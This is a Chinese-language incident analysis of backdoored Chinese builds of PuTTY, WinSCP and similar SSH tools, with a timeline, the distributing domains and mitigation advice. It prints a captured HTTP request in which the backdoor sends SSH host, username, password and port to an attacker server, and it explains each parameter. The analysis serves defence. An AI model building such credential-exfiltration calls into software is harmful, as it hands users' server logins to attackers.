近幾日，中文版putty等SSH遠程管理工具被曝出存在后門，該后門會自動竊取管理員所輸入的SSH用戶名與口令，并將其發送至指定服務器上。知道創宇安全研究小組在第一時間獲取該消息后，對此次事件進行了跟蹤和分析。根據分析，此次事件涉及到來自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站點的中文版putty、WinSCP、SSHSecure和sftp等軟件，而這些軟件的英文版本不受影響。

1．時間線

1月25日：新浪微博有網友發布消息稱putty和winscp中裝有后門程序，但該條微博并未提及后門程序的類型及其技術細節，而且消息也未被過多的人所重視，目前無法確定該條微博是否與此次事件有關聯：

1月30日下午16點左右：互聯網上再度出現關于中文版putty等SSH管理軟件被裝有后門的消息，并且此消息對后門的行為特征進行了簡要的描述——該程序會導致root密碼丟失，但發布者仍未披露具體的技術細節：

以上微博的短URL所對應的文章截圖如下：

1月31日：經過一晚的醞釀，putty事件開始在互聯網上廣泛傳播，微博、論壇等信息發布平臺上開始大量出現putty后門事件的消息，同時，很多技術人員也開始對含有后門的putty等SSH管理軟件進行技術分析，并陸續發布其中的技術細節。

2．事件分析

2.1問題軟件源頭

知道創宇安全研究團隊在獲取信息后，第一時間對putty等軟件進行了跟蹤分析。通過分析發現，來自以下幾個站點的中文版putty、WinSCP、SSHSecure和sftp等軟件都可能存在后門程序：

http://www.winscp.cc

http://www.sshsecure.com

2.2行為分析

2.2.1網絡行為分析

使用帶有后門程序的中文版putty等SSH管理軟件連接服務器時，程序會自動記錄登錄時的用戶名、密碼和服務器IP地址等信息，并會以HTTP的方式將這些信息發送到指定的服務器上，以下是在分析過程中抓取到的原始HTTP數據：

GET/yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTYHTTP/1.1

User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64;rv:6.0a2)Gecko/20110613Firefox/6.0a2

Host:l.ip-163.com:88

Pragma:no-cache

從以上數據可以獲得以下信息：

1.敏感信息通過HTTPGET的方式發送到服務器l.ip-163.com上（經測試，該域名與putty.org.cn位于同一IP地址上）

2.用于收集密碼的程序地址為

3.敏感信息以GET參數的方式發送到服務器上，相關參數為：

act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY

每個字段的作用如下：

act為執行的動作，參數add用于添加信息，經測試，也可使用del來刪除信息

user為SSH服務器的IP地址，此處為50.23.79.188

pwd為連接服務器時的登錄用戶名，此處為abc

ll1為登錄密碼，此處為pass

ll2為目標服務器的SSH端口，此處為22（即，默認端口）

ll3則為客戶端類型，此處為PuTTY

2.2.2服務器本地文件分析

知道創宇安全研究團隊借助文件完整性校驗的方式，對服務器初始安全狀態下的/etc、/lib、/usr、/bin等敏感目錄進行了完整性備份，并在putty連接測試后對這些目錄的文件變更、丟失和添加等情況進行了校驗，校驗結果顯示，中文版putty并未對服務器自動安裝后門程序。

網絡上部分消息稱，有些使用中文版putty進行過遠程管理的服務器上出現惡意代碼和文件，可能是由于惡意用戶獲取了putty所收集的密碼后人為植入所致。

2.3事件后續

截止至2月1日，在本次事件中所涉及的以下域名均已不能訪問：

http://www.putty.org.cn

http://putty.ws

http://www.winscp.cc

http://www.sshsecure.com

http://l.ip-163.com:88

但是，在1月31日晚，網絡上傳出“l.ip-163.com被黑”的消息并配有一張“受害者列表”的截圖：

而就在此消息發布不久之后，互聯網上便出現了完整的受害者列表供所有用戶瀏覽和下載，根據這份來自互聯網列表的顯示，不但有眾多政府網站位列其中，IBM、Oracle、HP等大廠商的服務器也出現在列表內。

3．安全建議

若您使用過中文版的putty、WinSCP、SSHSecure和sftp等軟件，但暫時又不能對服務器進行下線處理，可采取以下臨時解決方案來處理：

1.使用chkrootkit或rootkithunter對服務器進行掃描，檢查是否存在已知后門

2.查看網絡是否有可疑外聯，并加強對可疑外聯的監控

3.在網絡層建立端口訪問控制策略，阻止除正常業務外的一切非業務、非管理端口

4.更換SSH登錄密碼，建議登錄時使用證書加密碼的組合方式進行身份驗證

5.登錄SSH時，不要直接使用root用戶，先使用普通用戶登錄后，再su至root

6.服務器端通過TCPWrapper或iptables等軟件，限制IP訪問，僅允許特定IP地址對服務器的SSH進行連接和管理

7.如需使用putty、WinSCP等軟件，可訪問其官方站點下載：

http://www.putty.org/

http://winscp.net/eng/docs/lang:chs